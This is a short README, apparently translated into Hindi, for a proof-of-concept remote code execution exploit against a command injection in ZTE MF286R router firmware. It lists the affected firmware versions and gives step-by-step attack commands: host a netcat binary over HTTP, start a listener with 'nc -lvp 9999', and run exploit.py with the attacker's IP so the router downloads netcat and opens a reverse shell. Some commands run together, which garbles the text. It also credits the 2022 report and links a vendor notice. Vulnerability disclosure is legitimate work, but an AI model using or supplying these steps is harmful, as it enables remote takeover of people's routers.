
ZTE MF286R राउटर को प्रभावित करने वाली कमांड इंजेक्शन भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट, जिसमें RCE एक्सप्लॉइट शामिल है।
फ़र्मवेयर विवरण:
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10
pip install requests)यह भेद्यता zte_net_link_detect बाइनरी और वेबसर्वर goahead बाइनरी में WATCH_DOG_SWITCH हैंडलर के बीच एक साझा कमांड इंजेक्शन है।
ध्यान दें कि भेद्यता का शोषण केवल तभी किया जा सकता है जब राउटर WAN से जुड़ा हो या SIM कार्ड के माध्यम से इंटरनेट से जुड़ा हो। ("ppp_status" कुंजी का मान "ppp_connected" या "ipv4_ipv6_connected" या "ipv6_connected" होना चाहिए)।
एक्सप्लॉइट का विचार netcat स्टेटिक बाइनरी को एक http सर्वर से डाउनलोड करना और फिर उसके साथ एक रिवर्स शेल खोलना है। P.S: इस फ़ोल्डर में शामिल netcat बिग एंडियन है।
python3 -m http.server 8080nc -lvp 9999 के साथ पोर्ट 9999 पर एक लिसनिंग सॉकेट खोलेंpython3 exploit.py http://<router> <admin_password> <attacker_ip, es: 192.168.1.101>यह भेद्यता सितंबर 2022 में Andrea Maugeri द्वारा रिपोर्ट की गई थी। https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664